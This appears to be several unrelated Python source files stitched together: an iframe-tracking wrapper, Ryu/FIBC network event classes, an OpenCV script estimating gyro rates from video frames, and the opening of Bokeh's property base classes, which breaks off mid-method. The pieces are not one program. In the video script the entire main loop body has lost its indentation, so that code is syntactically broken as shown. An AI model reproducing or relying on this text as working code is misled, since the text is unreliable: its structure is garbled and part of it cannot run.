            frameloc = self.iframe_locators[next_framelevel]
            # we use the obj's owner's find_element to help us deal
            # with the edge case where obj is in an iframe and the owner is not
            # if obj and owner are in different frames, we will first
            # get into the owner's frame, then perform a search for the element
            frame = self.obj.owner.find_element(frameloc)
            self.obj.logger.debug('-> switching to iframe: %s' % (frameloc))
            self.obj._browser.switch_to_frame(frame)
            self.current_framelevel = next_framelevel
            switched_frames = True
        return switched_frames
def IframeWrap(obj,framelocids):
    """Attach (or extend) an IframeTracker on obj and wrap the object.

    framelocids may be a single locator id or an iterable of ids,
    inner-most iframe first.  Returns obj for chaining.
    """
    # reuse an existing tracker when the object was already wrapped once
    tracker = obj.iframe_tracker
    if tracker is None:
        tracker = IframeTracker(obj)
    # normalize a single locator id into a list
    if not hasattr(framelocids,'__iter__'):
        framelocids = [framelocids]
    # register each iframe, inner most iframe first
    for locid in framelocids:
        tracker.add_iframe(locid)
    tracker.wrap_new_object(obj)
    return obj
# a = A()
# a = IframeWrap(a,['iframe'])
# a = IframeWrap(a,['iframe2','iframe1'])
# a = IframeWrap(IframeWrap(a,'iframe2'),'iframe1')
| |
# -*- coding: utf-8 -*-
# Copyright (C) 2017 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
FIBC Event
"""
from ryu.controller import event
from fabricflow.fibc.api import fibcapi_pb2 as pb
class EventFIBCBase(event.EventBase):
    """
    Base class for all FIBC events.

    msg   -- payload carried by the event
    mtype -- protobuf message type constant (defaults to pb.UNSPEC)
    """
    # pylint: disable=too-few-public-methods
    def __init__(self, msg, mtype=pb.UNSPEC):
        super(EventFIBCBase, self).__init__()
        self.mtype = mtype
        self.msg = msg
class EventFIBCPortConfig(EventFIBCBase):
    """
    FIBC PortConfig event
    msg: ryu.ofproto.OFPPort
    """
    # pylint: disable=too-few-public-methods
    pass
# pylint: disable=too-few-public-methods
class EventFIBCDpPortConfig(EventFIBCBase):
    """
    FIBC DP PortConfig event.

    msg: ryu.ofproto.OFPPort
    """
    def __init__(self, msg, dp_id, port_id, enter, state):
        super(EventFIBCDpPortConfig, self).__init__(msg)
        # identity of the datapath/port this config refers to
        self.dp_id = dp_id
        self.port_id = port_id
        # lifecycle flags supplied by the caller
        self.state = state
        self.enter = enter
class EventFIBCVsPortConfig(EventFIBCBase):
    """
    FIBC VS PortConfig event.

    msg: ffpacket
    """
    # pylint: disable=too-few-public-methods
    def __init__(self, msg, vs_id, port_id):
        super(EventFIBCVsPortConfig, self).__init__(msg)
        self.port_id = port_id
        self.vs_id = vs_id
class EventFIBCPortStatus(EventFIBCBase):
    """
    FIBC PortStatus event
    msg: pb.PortStatus
    """
    # pylint: disable=too-few-public-methods
    def __init__(self, msg):
        super(EventFIBCPortStatus, self).__init__(msg, pb.PORT_STATUS)
class EventFIBCVmConfig(EventFIBCBase):
    """
    FIBC VM Config event
    msg: pb.Hello
    """
    # pylint: disable=too-few-public-methods
    def __init__(self, msg, enter):
        super(EventFIBCVmConfig, self).__init__(msg, pb.HELLO)
        # enter: boolean flag supplied by the caller
        self.enter = enter
class EventFIBCDpConfig(EventFIBCBase):
    """
    FIBC Dp config event.

    msg: None
    """
    # pylint: disable=too-few-public-methods
    def __init__(self, msg, dp_id, enter):
        super(EventFIBCDpConfig, self).__init__(msg)
        self.enter = enter
        self.dp_id = dp_id
class EventFIBCDpStatus(EventFIBCBase):
    """
    FIBC Dp status event
    msg: pb.DpStatus
    """
    # pylint: disable=too-few-public-methods
    def __init__(self, msg):
        super(EventFIBCDpStatus, self).__init__(msg, pb.DP_STATUS)
class EventFIBCFFPortMod(EventFIBCBase):
    """
    FIBC FFPortMod event
    msg: pb.FFPortMod
    """
    # pylint: disable=too-few-public-methods
    def __init__(self, msg):
        super(EventFIBCFFPortMod, self).__init__(msg, pb.FF_PORT_MOD)
class EventFIBCFlowMod(EventFIBCBase):
    """
    FIBC FlowMod event
    msg: pb.FlowMod
    """
    # pylint: disable=too-few-public-methods
    def __init__(self, msg):
        super(EventFIBCFlowMod, self).__init__(msg, pb.FLOW_MOD)
class EventFIBCGroupMod(EventFIBCBase):
    """
    FIBC GroupMod event
    msg: pb.GroupMod
    """
    # pylint: disable=too-few-public-methods
    def __init__(self, msg):
        super(EventFIBCGroupMod, self).__init__(msg, pb.GROUP_MOD)
class EventFIBCPortMap(EventFIBCBase):
    """
    FIBC PortMap event.

    cmd: "ADD" "DELETE"
    table / msg pairs:
      "dp"    -> fibcdbm.create_dp()
      "idmap" -> fibcdbm.create_idmap()
      "port"  -> fibcdbm.create_ports()
    """
    # pylint: disable=too-few-public-methods
    def __init__(self, msg, cmd, table):
        super(EventFIBCPortMap, self).__init__(msg)
        self.table = table
        self.cmd = cmd
class EventFIBCEnterDP(EventFIBCBase):
    """
    FIBC EnterDP event.

    msg: None
    dp : FFDatapath
    enter: True or False
    ports: list of fibcapi.FFPort
    """
    # pylint: disable=too-few-public-methods
    def __init__(self, dpath, enter, ports):
        super(EventFIBCEnterDP, self).__init__(None)
        self.dp = dpath  # pylint: disable=invalid-name
        self.ports = ports
        self.enter = enter
class EventFIBCFFPortStatus(EventFIBCBase):
    """
    FIBC FFPortStatus event
    msg: lib.fibcryu.FFPortStatus
    """
    # pylint: disable=too-few-public-methods
    pass
class EventFIBCMultipartRequest(EventFIBCBase):
    """
    FIBC FFMultipart Request event.

    msg: pb.FFMultipart.Request
    dpath: FFDatapath
    """
    # pylint: disable=too-few-public-methods
    def __init__(self, dpath, msg):
        # BUG FIX: was 'super(...).__init__(msg. pb.FF_MULTIPART_REQUEST)' --
        # a dot instead of a comma, which evaluated 'msg.pb' (AttributeError
        # at runtime) and never passed the message type through.
        super(EventFIBCMultipartRequest, self).__init__(msg, pb.FF_MULTIPART_REQUEST)
        self.dp = dpath  # pylint: disable=invalid-name
class EventFIBCMultipartReply(EventFIBCBase):
    """
    FIBC FFMultipart Reply event.

    msg: pb.FFMultipart.Reply
    dpath: FFDatapath
    """
    # pylint: disable=too-few-public-methods
    def __init__(self, dpath, msg, xid=0):
        super(EventFIBCMultipartReply, self).__init__(msg, pb.FF_MULTIPART_REPLY)
        self.xid = xid
        self.dp = dpath  # pylint: disable=invalid-name
class EventFIBCPacketIn(EventFIBCBase):
    """
    FIBC FFPacketIn event.

    msg: pb.FFPacketIn
    dpath: FFDatapath
    """
    def __init__(self, dpath, msg, xid=0):
        super(EventFIBCPacketIn, self).__init__(msg, pb.FF_PACKET_IN)
        self.xid = xid
        self.dp = dpath  # pylint: disable=invalid-name
class EventFIBCPacketOut(EventFIBCBase):
    """
    FIBC FFPacketOut event.

    msg: pb.FFPacketOut
    dpath: FFDatapath
    """
    def __init__(self, dpath, msg, xid=0):
        super(EventFIBCPacketOut, self).__init__(msg, pb.FF_PACKET_OUT)
        self.datapath = dpath
        # consistency: sibling FF events (EventFIBCPacketIn,
        # EventFIBCMultipartReply, ...) expose the datapath as 'dp';
        # provide the same name here without breaking '.datapath' readers
        self.dp = dpath  # pylint: disable=invalid-name
        self.xid = xid
class EventFIBCL2AddrStatus(EventFIBCBase):
    """
    FIBC L2AddrStatus event
    msg: pb.L2AddrStatus
    """
    def __init__(self, msg):
        super(EventFIBCL2AddrStatus, self).__init__(msg, pb.L2ADDR_STATUS)
class EventFIBCFFL2AddrStatus(EventFIBCBase):
    """
    FIBC FFL2AddrStatus event.

    msg: pb.FFL2AddrStatus
    dpath: FFDatapath
    """
    def __init__(self, dpath, msg, xid=0):
        super(EventFIBCFFL2AddrStatus, self).__init__(msg, pb.FF_L2ADDR_STATUS)
        self.xid = xid
        self.datapath = dpath
| |
#!/usr/bin/env python3
import argparse
import csv
import cv2
import skvideo.io # pip3 install sk-video
import json
import math
import numpy as np
import os
from tqdm import tqdm
from props import PropertyNode
import props_json
import sys
sys.path.append('../scripts')
from lib import transformations
import camera
# constants
d2r = math.pi / 180.0           # degrees -> radians
r2d = 180.0 / math.pi           # radians -> degrees
match_ratio = 0.75              # Lowe ratio-test threshold for knn matches
max_features = 500              # per-frame feature budget (ORB)
catchup = 0.02                  # NOTE(review): appears unused here -- confirm
affine_minpts = 7               # min correspondences for affine estimation
tol = 1.0                       # geometric filter tolerance (rescaled per frame)
parser = argparse.ArgumentParser(description='Estimate gyro biases from movie.')
parser.add_argument('video', help='video file')
parser.add_argument('--camera', help='select camera calibration file')
parser.add_argument('--scale', type=float, default=1.0, help='scale input')
parser.add_argument('--skip-frames', type=int, default=0, help='skip n initial frames')
parser.add_argument('--no-equalize', action='store_true', help='disable image equalization')
parser.add_argument('--write', action='store_true', help='write out video with keypoints shown')
args = parser.parse_args()
#file = args.video
scale = args.scale
skip_frames = args.skip_frames
# pathname work: derive output names from the input video name
abspath = os.path.abspath(args.video)
filename, ext = os.path.splitext(abspath)
dirname = os.path.dirname(args.video)
output_csv = filename + "_rates.csv"
output_video = filename + "_keypts.mp4"
local_config = os.path.join(dirname, "camera.json")
# NOTE: rebinds the imported 'camera' module name to the camera instance
camera = camera.VirtualCamera()
camera.load(args.camera, local_config, args.scale)
K = camera.get_K()              # camera matrix
IK = camera.get_IK()            # inverse camera matrix
dist = camera.get_dist()        # distortion coefficients
print('Camera:', camera.get_name())
print('K:\n', K)
print('IK:\n', IK)
print('dist:', dist)
# principal point (pixels)
cu = K[0,2]
cv = K[1,2]
metadata = skvideo.io.ffprobe(args.video)
#print(metadata.keys())
print(json.dumps(metadata["video"], indent=4))
fps_string = metadata['video']['@avg_frame_rate']
(num, den) = fps_string.split('/')
fps = float(num) / float(den)
codec = metadata['video']['@codec_long_name']
w = int(round(int(metadata['video']['@width']) * scale))
h = int(round(int(metadata['video']['@height']) * scale))
total_frames = int(round(float(metadata['video']['@duration']) * fps))
print('fps:', fps)
print('codec:', codec)
print('output size:', w, 'x', h)
print('total frames:', total_frames)
print("Opening ", args.video)
reader = skvideo.io.FFmpegReader(args.video, inputdict={}, outputdict={})
if args.write:
    inputdict = {
        '-r': str(fps)
    }
    # NOTE(review): 'lossless' is defined but never used; only 'sane'
    # is passed to the writer below -- confirm that is intentional
    lossless = {
        # See all options: https://trac.ffmpeg.org/wiki/Encode/H.264
        '-vcodec': 'libx264',  # use the h.264 codec
        '-crf': '0',           # set the constant rate factor to 0, (lossless)
        '-preset': 'veryslow', # maximum compression
        '-r': str(fps)         # match input fps
    }
    sane = {
        # See all options: https://trac.ffmpeg.org/wiki/Encode/H.264
        '-vcodec': 'libx264',  # use the h.264 codec
        '-crf': '17',          # visually lossless (or nearly so)
        '-preset': 'medium',   # default compression
        '-r': str(fps)         # match input fps
    }
    video_writer = skvideo.io.FFmpegWriter(output_video, inputdict=inputdict, outputdict=sane)
# find affine transform between matching keypoints in pixel
# coordinate space.  NOTE: cv2.estimateAffinePartial2D() always solves
# the constrained (rotation/translation/scale) problem; the fullAffine
# parameter is kept only for interface compatibility and is ignored.
def findAffine(src, dst, fullAffine=False):
    """Estimate a partial 2D affine transform mapping src -> dst.

    Returns (affine, status); both are None when there are fewer than
    affine_minpts correspondences.
    """
    if len(src) >= affine_minpts:
        # affine = cv2.estimateRigidTransform(np.array([src]), np.array([dst]), fullAffine)
        affine, status = \
            cv2.estimateAffinePartial2D(np.array([src]).astype(np.float32),
                                        np.array([dst]).astype(np.float32))
        used = np.count_nonzero(status)
    else:
        # not enough points to solve; report 0 used instead of calling
        # np.count_nonzero(None), which miscounted None as one nonzero
        affine = None
        status = None
        used = 0
    print("num pts:", len(src), "used:", used, "affine:\n", affine)
    return affine, status
def decomposeAffine(affine):
    """Break a 2x3 affine matrix into (rotate_rad, tx, ty, sx, sy).

    Rotation is recovered with atan2 and kept within (-pi, pi]; the
    scale factors take the signs of the corresponding diagonal terms.
    A None input yields the identity decomposition.
    """
    if affine is None:
        print("HEY: we should never see affine=None here!")
        return (0.0, 0.0, 0.0, 1.0, 1.0)

    a, b, tx = affine[0][0], affine[0][1], affine[0][2]
    c, d, ty = affine[1][0], affine[1][1], affine[1][2]

    sx = math.sqrt(a * a + b * b)
    if a < 0.0:
        sx = -sx
    sy = math.sqrt(c * c + d * d)
    if d < 0.0:
        sy = -sy

    rotate_rad = math.atan2(-b, a)
    while rotate_rad < -math.pi:
        rotate_rad += 2 * math.pi
    while rotate_rad > math.pi:
        rotate_rad -= 2 * math.pi

    return (rotate_rad, tx, ty, sx, sy)
def filterMatches(kp1, kp2, matches):
    """Apply the Lowe ratio test to knn matches and de-duplicate train hits.

    Returns (p1, p2, kp_pairs, idx_pairs): matched point coordinates,
    the keypoint pairs themselves, and their (queryIdx, trainIdx) pairs.
    """
    mkp1, mkp2, idx_pairs = [], [], []
    used = np.zeros(len(kp2), np.bool_)
    for pair in matches:
        # ratio test: best match must clearly beat the runner-up
        if len(pair) == 2 and pair[0].distance < pair[1].distance * match_ratio:
            #print " dist[0] = %d  dist[1] = %d" % (pair[0].distance, pair[1].distance)
            best = pair[0]
            # FIXME: ignore the bottom section of movie for feature detection
            #if kp1[best.queryIdx].pt[1] > h*0.75:
            #    continue
            # each train keypoint may be claimed at most once
            if not used[best.trainIdx]:
                used[best.trainIdx] = True
                mkp1.append( kp1[best.queryIdx] )
                mkp2.append( kp2[best.trainIdx] )
                idx_pairs.append( (best.queryIdx, best.trainIdx) )
    p1 = np.float32([kp.pt for kp in mkp1])
    p2 = np.float32([kp.pt for kp in mkp2])
    return p1, p2, zip(mkp1, mkp2), idx_pairs
def filterFeatures(p1, p2, K, method):
    """Filter matched point pairs with a geometric consistency model.

    method: 'homography', 'fundamental', 'essential', or 'none'.
    Returns (M, status, inlier_p1, inlier_p2) where M is the fitted model
    (None for 'none' or when fewer than 7 points are given) and status
    flags which input pairs survived.
    """
    if len(p1) < 7:
        # not enough points for any of the estimators
        return None, np.zeros(len(p1)), [], []
    M = None
    status = []
    if method == 'homography':
        M, status = cv2.findHomography(p1, p2, cv2.RANSAC, tol)
    elif method == 'fundamental':
        M, status = cv2.findFundamentalMat(p1, p2, cv2.RANSAC, tol)
    elif method == 'essential':
        M, status = cv2.findEssentialMat(p1, p2, K, cv2.LMEDS,
                                         prob=0.99999, threshold=tol)
    elif method == 'none':
        # accept everything
        M = None
        status = np.ones(len(p1))
    # keep only the inlier pairs
    # (removed dead locals 'space', 'inliers', 'total' from the original)
    newp1 = []
    newp2 = []
    for i, flag in enumerate(status):
        if flag:
            newp1.append(p1[i])
            newp2.append(p2[i])
    #print('%d / %d  inliers/matched' % (np.sum(status), len(status)))
    return M, status, np.float32(newp1), np.float32(newp2)
# track persistant edges and create a mask from them (useful when
# portions of our own airframe are visible in the video)
edges_accum = None    # running float32 average of Canny edge images
edges_counter = 1     # number of frames folded into the average so far
edge_filt_time = 15 # sec
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (9, 9))  # mask dilation kernel
def make_edge_mask(gray):
    """Accumulate persistent Canny edges over up to edge_filt_time seconds
    and return a dilated binary mask of them.

    Updates module state (edges_accum, edges_counter).  Returns a uint8
    mask image where nonzero pixels mark persistent edges to ignore.
    """
    global edges_accum
    global edges_counter
    # exponential moving average whose effective window grows with the
    # number of frames seen, capped at edge_filt_time seconds
    # (was a hard-coded 15 that duplicated the edge_filt_time constant)
    avail_sec = edges_counter / fps
    secs = np.min([avail_sec, edge_filt_time])
    edge_filt_frames = secs * fps
    weight_a = (edge_filt_frames - 1) / edge_filt_frames
    weight_b = 1 / edge_filt_frames
    print("weights:", edges_counter, secs, edge_filt_frames, weight_a, weight_b)
    edges = cv2.Canny(gray, 50, 150)
    print("edges:", np.count_nonzero(edges))
    cv2.imshow("edges", edges)
    if edges_accum is None:
        edges_accum = edges.astype(np.float32)
    else:
        edges_accum = weight_a * edges_accum + weight_b * edges.astype(np.float32)
    cv2.imshow("edges filter", edges_accum.astype('uint8'))
    # threshold at 40% of the strongest accumulated response
    # (renamed local from 'max', which shadowed the builtin)
    peak = np.max(edges_accum)
    thresh = int(round(peak * 0.4))
    print("max edges:", (edges_accum >= thresh).sum())
    ratio = (edges_accum >= thresh).sum() / (edges_accum.shape[0]*edges_accum.shape[1])
    print("ratio:", ratio)
    if ratio < 0.01:
        ret2, thresh1 = cv2.threshold(edges_accum.astype('uint8'), thresh, 255, cv2.THRESH_BINARY)
        thresh1 = cv2.dilate(thresh1, kernel, iterations=2)
    else:
        # too much of the frame registers as edge: mask nothing
        thresh1 = edges_accum * 0
    cv2.imshow('edge thresh1', thresh1)
    edges_counter += 1
    return thresh1
# only pass through keypoints if they aren't masked by the mask image
def apply_edge_mask(mask, kp_list):
    """Return the keypoints whose (rounded) pixel in mask is zero."""
    return [kp for kp in kp_list
            if mask[int(round(kp.pt[1])), int(round(kp.pt[0]))] == 0]
# feature detector / matcher selection (flip the if to use SIFT instead)
if True:
    # for ORB
    detector = cv2.ORB_create(max_features)
    extractor = detector
    norm = cv2.NORM_HAMMING
    matcher = cv2.BFMatcher(norm)
else:
    # for SIFT
    max_features = 200
    detector = cv2.SIFT_create(nfeatures=max_features, nOctaveLayers=5)
    extractor = detector
    norm = cv2.NORM_L2
    FLANN_INDEX_KDTREE = 1  # bug: flann enums are missing
    FLANN_INDEX_LSH = 6
    flann_params = { 'algorithm': FLANN_INDEX_KDTREE,
                     'trees': 5 }
    matcher = cv2.FlannBasedMatcher(flann_params, {}) # bug : need to pass empty dict (#1329)
# per-frame tracking state
accum = None
kp_list_last = []
des_list_last = []
p1 = []
p2 = []
counter = -1          # frame index; first processed frame becomes 0
rot_last = 0
tx_last = 0
ty_last = 0
if not args.no_equalize:
    # CLAHE adaptive equalization improves feature stability
    clahe = cv2.createCLAHE(clipLimit=3.0, tileGridSize=(8,8))
# CSV output of estimated body rates (affine 'p/q/r' and homography 'h*')
csvfile = open(output_csv, 'w')
fieldnames=[ 'frame', 'video time',
             'p (rad/sec)', 'q (rad/sec)', 'r (rad/sec)',
             'hp (rad/sec)', 'hq (rad/sec)', 'hr (rad/sec)' ]
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
hp = 0
hq = 0
hr = 0
pbar = tqdm(total=int(total_frames), smoothing=0.05)
for frame in reader.nextFrame():
frame = frame[:,:,::-1] # convert from RGB to BGR (to make opencv happy)
counter += 1
if counter < skip_frames:
if counter % 100 == 0:
print("Skipping %d frames..." % counter)
else:
continue
# print "Frame %d" % counter
method = cv2.INTER_AREA
#method = cv2.INTER_LANCZOS4
frame_scale = cv2.resize(frame, (0,0), fx=scale, fy=scale,
interpolation=method)
cv2.imshow('scaled orig', frame_scale)
shape = frame_scale.shape
tol = shape[1] / 200.0
if tol < 1.0: tol = 1.0
frame_undist = cv2.undistort(frame_scale, K, np.array(dist))
gray = cv2.cvtColor(frame_undist, cv2.COLOR_BGR2GRAY)
if not args.no_equalize:
gray = clahe.apply(gray)
cv2.imshow("gray equalized", gray)
edge_mask = make_edge_mask(gray)
kp_list = detector.detect(gray)
kp_list = apply_edge_mask(edge_mask, kp_list)
kp_list, des_list = extractor.compute(gray, kp_list)
# Fixme: make a command line option
# possible values are "homography", "fundamental", "essential", "none"
filter_method = "homography"
if des_list_last is None or des_list is None or len(des_list_last) == 0 or len(des_list) == 0:
kp_list_last = kp_list
des_list_last = des_list
continue
#print(len(des_list_last), len(des_list))
matches = matcher.knnMatch(des_list, trainDescriptors=des_list_last, k=2)
p1, p2, kp_pairs, idx_pairs = filterMatches(kp_list, kp_list_last, matches)
kp_list_last = kp_list
des_list_last = des_list
M, status, newp1, newp2 = filterFeatures(p1, p2, K, filter_method)
if len(newp1) < 1:
continue
affine, aff_status = findAffine(newp2 - np.array([cu,cv]),
newp1 - np.array([cu,cv]),
fullAffine=False)
if affine is None:
continue
(rot, tx, ty, sx, sy) = decomposeAffine(affine)
if abs(rot) > 0.1 or math.sqrt(tx*tx+ty*ty) > 20:
print("sanity limit:", rot, tx, ty)
(rot, tx, ty, sx, sy) = (0.0, 0.0, 0.0, 1.0, 1.0)
#print affine
print("affine:", rot, tx, ty)
translate_only = False
rotate_translate_only = True
if translate_only:
rot = 0.0
sx = 1.0
sy = 1.0
elif rotate_translate_only:
sx = 1.0
sy = 1.0
# roll rate from affine rotation
p = -rot * fps
# pitch and yaw rates from affine translation projected through
# camera calibration
# as an approximation, for estimating angle from translation, use
# a point a distance away from center that matches the average
# feature distance from center.
diff = newp1 - np.array([cu, cv])
xoff = np.mean(np.abs(diff[:,0]))
yoff = np.mean(np.abs(diff[:,1]))
print("avg xoff: %.2f" % xoff, "avg yoff: %.2f" % yoff)
#print(cu, cv)
#print("IK:", IK)
uv0 = np.array([cu+xoff, cv+yoff, 1.0])
uv1 = np.array([cu+xoff-tx, cv+yoff, 1.0])
uv2 = np.array([cu+xoff, cv+yoff+ty, 1.0])
proj0 = IK.dot(uv0)
proj1 = IK.dot(uv1)
proj2 = IK.dot(uv2)
#print(proj1, proj2)
dp1 = np.dot(proj0/np.linalg.norm(proj0), proj1/np.linalg.norm(proj1))
dp2 = np.dot(proj0/np.linalg.norm(proj0), proj2/np.linalg.norm(proj2))
if dp1 > 1:
print("dp1 limit")
dp1 = 1
if dp2 > 1:
print("dp2 limit")
dp2 = 1
#print("dp:", dp1, dp2)
if uv1[0] < cu+xoff:
r = -np.arccos(dp1) * fps
else:
r = np.arccos(dp1) * fps
if uv2[1] < cv+yoff:
q = -np.arccos(dp2) * fps
else:
q = np.arccos(dp2) * fps
print("A ypr: %.2f %.2f %.2f" % (r, q, p))
# alternative method for determining pose change from previous frame
if filter_method == "homography" and not M is None:
print("M:\n", M)
(result, Rs, tvecs, norms) = cv2.decomposeHomographyMat(M, K)
possible = cv2.filterHomographyDecompByVisibleRefpoints(Rs, norms, np.array([newp1]), np.array([newp2]))
#print("R:", Rs)
print("Num:", len(Rs), "poss:", possible)
best = 100000
best_index = None
best_val = None
for i, R in enumerate(Rs):
(Hpsi, Hthe, Hphi) = transformations.euler_from_matrix(R, 'rzyx')
hp = Hpsi * fps
hq = Hphi * fps
hr = Hthe * fps
d = np.linalg.norm( np.array([p, q, r]) - np.array([hp, hq, hr]) )
if d < best:
best = d
best_index = i
best_val = [hp, hq, hr]
print(" H ypr: %.2f %.2f %.2f" % (hp, hq, hr))
(hp, hq, hr) = best_val
print("R:\n", Rs[best_index])
print("H ypr: %.2f %.2f %.2f" % (hp, hq, hr))
elif filter_method == "essential" and not M is None:
#print("M:", M)
R1, R2, t = cv2.decomposeEssentialMat(M)
#print("R1:\n", R1)
#print("R2:\n", R2)
(psi1, the1, phi1) = transformations.euler_from_matrix(R1, 'rzyx')
(psi2, the2, phi2) = transformations.euler_from_matrix(R2, 'rzyx')
#print("ypr1: %.2f %.2f %.2f" % (psi1*r2d, the1*r2d, phi1*r2d))
#print("ypr2: %.2f %.2f %.2f" % (psi2*r2d, the2*r2d, phi2*r2d))
# we are expecting very small pose changes
norm1 = np.linalg.norm( [psi1, the1, phi1] )
norm2 = np.linalg.norm( [psi2, the2, phi2] )
if norm1 < norm2:
Epsi = psi1; Ethe = the1; Ephi = phi1
else:
Epsi = psi2; Ethe = the2; Ephi = phi2
if norm1 > 0.1 and norm2 > 0.1:
print("NOISE:")
print("M:\n", M)
print("t:\n", t)
print("R1:\n", R1)
print("R2:\n", R2)
print("ypr1: %.2f %.2f %.2f" % (psi1*r2d, the1*r2d, phi1*r2d))
print("ypr2: %.2f %.2f %.2f" % (psi2*r2d, the2*r2d, phi2*r2d))
cv2.waitKey()
print("Eypr: %.2f %.2f %.2f" % (Epsi, Ethe, Ephi))
# we can attempt to extract frame rotation from the
# essential matrix (but this seems currently very noisy or
# something is wrong in my assumptions or usage.)
#(n, R, tvec, mask) = cv2.recoverPose(E=M,
# points1=p1, points2=p2,
# cameraMatrix=K)
#print("R:", R)
#(yaw, pitch, roll) = transformations.euler_from_matrix(R, 'rzyx')
#print("ypr: %.2f %.2f %.2f" % (yaw*r2d, pitch*r2d, roll*r2d))
# divide tx, ty by args.scale to get a translation value
# relative to the original movie size.
row = { 'frame': counter,
'video time': "%.4f" % (counter / fps),
'p (rad/sec)': "%.4f" % p,
'q (rad/sec)': "%.4f" % q,
'r (rad/sec)': "%.4f" % r,
'hp (rad/sec)': "%.4f" % hp,
'hq (rad/sec)': "%.4f" % hq,
'hr (rad/sec)': "%.4f" % hr
}
#print(row)
writer.writerow(row)
#print("affine motion: %d %.2f %.1f %.1f" % (counter, rot, tx, ty))
#print("est gyro: %d %.3f %.3f %.3f" % (counter, p, q, r))
if True:
ah = np.vstack([affine, [0, 0, 1]])
print("ah:\n", ah)
h, w = frame_undist.shape[:2]
print(frame_undist.shape)
pts = []
for x in np.linspace(0, w, num=11, endpoint=True):
for y in np.linspace(0, h, num=11, endpoint=True):
pts.append( [x, y] )
pts1 = np.array([pts])
#newpts = pts.dot(M.T)
print(pts1.shape)
Mi = np.linalg.inv(M)
newpts = cv2.perspectiveTransform(pts1, Mi)
print(newpts.shape)
for i in range(len(pts)):
p1 = pts[i]
p2 = newpts[0][i]
cv2.line(frame_undist,
(int(round(p1[0])), int(round(p1[1]))),
(int(round(p2[0])), int(round(p2[1]))),
(0,255,0), 1, cv2.LINE_AA)
for pt in newp1:
cv2.circle(frame_undist, (int(pt[0]), int(pt[1])), 2, (64,212,64), 1, cv2.LINE_AA)
if False:
for i in range(newp1.shape[0]):
p1 = newp1[i]
p2 = newp2[i]
cv2.line(frame_undist,
(int(round(p1[0])), int(round(p1[1]))),
(int(round(p2[0])), int(round(p2[1]))),
(0,255,0), 1, cv2.LINE_AA)
if False:
for pt in newp1:
cv2.circle(frame_undist, (int(pt[0]), int(pt[1])), 3, (0,255,0), 1, cv2.LINE_AA)
for pt in newp2:
cv2.circle(frame_undist, (int(pt[0]), int(pt[1])), 2, (0,0,255), 1, cv2.LINE_AA)
if False:
diff = newp1 - newp2
x = newp1[:,0] # dist from center
y = diff[:,0] # u difference
#print(diff[:,0])
fit, res, _, _, _ = np.polyfit( x, y, 2, full=True )
print(fit)
func = np.poly1d(fit)
print("val at cu:", func(cu))
cv2.imshow('bgr', frame_undist)
if args.write:
video_writer.writeFrame(frame_undist[:,:,::-1])
if 0xFF & cv2.waitKey(5) == 27:
break
pbar.update(1)
pbar.close()
cv2.destroyAllWindows()
| |
''' Provide base classes for the Bokeh property system.
.. note::
These classes form part of the very low-level machinery that implements
the Bokeh model and property system. It is unlikely that any of these
classes or their methods will be applicable to any standard usage or to
anyone who is not directly developing on Bokeh's own infrastructure.
'''
from __future__ import absolute_import
import logging
logger = logging.getLogger(__name__)
from copy import copy
import types
from six import string_types
from ...util.string import nice_join
from .containers import PropertyValueList, PropertyValueDict
from .descriptor_factory import PropertyDescriptorFactory
from .descriptors import BasicPropertyDescriptor
class DeserializationError(Exception):
    ''' Raised when a JSON value cannot be converted into a property value
    (see e.g. ``PrimitiveProperty.from_json``).

    '''
    pass
class Property(PropertyDescriptorFactory):
    ''' Base class for Bokeh property instances, which can be added to Bokeh
    Models.

    Args:
        default (obj or None, optional) :
            A default value for attributes created from this property to
            have (default: None)

        help (str or None, optional) :
            A documentation string for this property. It will be automatically
            used by the :ref:`bokeh.sphinxext.bokeh_prop` extension when
            generating Sphinx documentation. (default: None)

        serialized (bool, optional) :
            Whether attributes created from this property should be included
            in serialization (default: True)

        readonly (bool, optional) :
            Whether attributes created from this property are read-only.
            (default: False)

    '''

    def __init__(self, default=None, help=None, serialized=True, readonly=False):
        # This is how the descriptor is created in the class declaration.
        # Read-only properties are never serialized, regardless of the
        # ``serialized`` argument.
        self._serialized = False if readonly else serialized
        self._readonly = readonly
        self._default = default
        self.__doc__ = help
        # (type, converter) pairs registered via accepts()
        self.alternatives = []
        # (fn, msg_or_fn) pairs registered via asserts()
        self.assertions = []

        # "fail early" when a default is invalid
        self.validate(self._raw_default())

    def __str__(self):
        return self.__class__.__name__

    @classmethod
    def _sphinx_prop_link(cls):
        ''' Generate a sphinx :class: link to this property.

        '''
        return ":class:`~bokeh.core.properties.%s` " % cls.__name__

    @staticmethod
    def _sphinx_model_link(name):
        ''' Generate a sphinx :class: link to given named model.

        '''
        return ":class:`~%s` " % name

    def _sphinx_type(self):
        ''' Generate a Sphinx-style reference to this type for documentation
        automation purposes.

        '''
        return self._sphinx_prop_link()

    def make_descriptors(self, base_name):
        ''' Return a list of ``BasicPropertyDescriptor`` instances to install
        on a class, in order to delegate attribute access to this property.

        Args:
            base_name (str) : the name of the property these descriptors are for

        Returns:
            list[BasicPropertyDescriptor]

        The descriptors returned are collected by the ``MetaHasProps``
        metaclass and added to ``HasProps`` subclasses during class creation.
        '''
        return [ BasicPropertyDescriptor(base_name, self) ]

    def _may_have_unstable_default(self):
        ''' Whether the default may differ between uses.

        Returns False if we have a default that is immutable, and will be the
        same every time; True when the default is generated on demand by a
        function call.

        '''
        return isinstance(self._default, types.FunctionType)

    @classmethod
    def _copy_default(cls, default):
        ''' Return a copy of the default, or a new value if the default
        is specified by a function.

        '''
        if not isinstance(default, types.FunctionType):
            return copy(default)
        else:
            return default()

    def _raw_default(self):
        ''' Return the untransformed default value.

        The raw_default() needs to be validated and transformed by
        prepare_value() before use, and may also be replaced later by
        subclass overrides or by themes.

        '''
        return self._copy_default(self._default)

    def themed_default(self, cls, name, theme_overrides):
        ''' The default, transformed by prepare_value() and the theme overrides.

        '''
        overrides = theme_overrides
        # Fall back to class-level overridden defaults when the theme does
        # not supply a value for this property name.
        if overrides is None or name not in overrides:
            overrides = cls._overridden_defaults()

        if name in overrides:
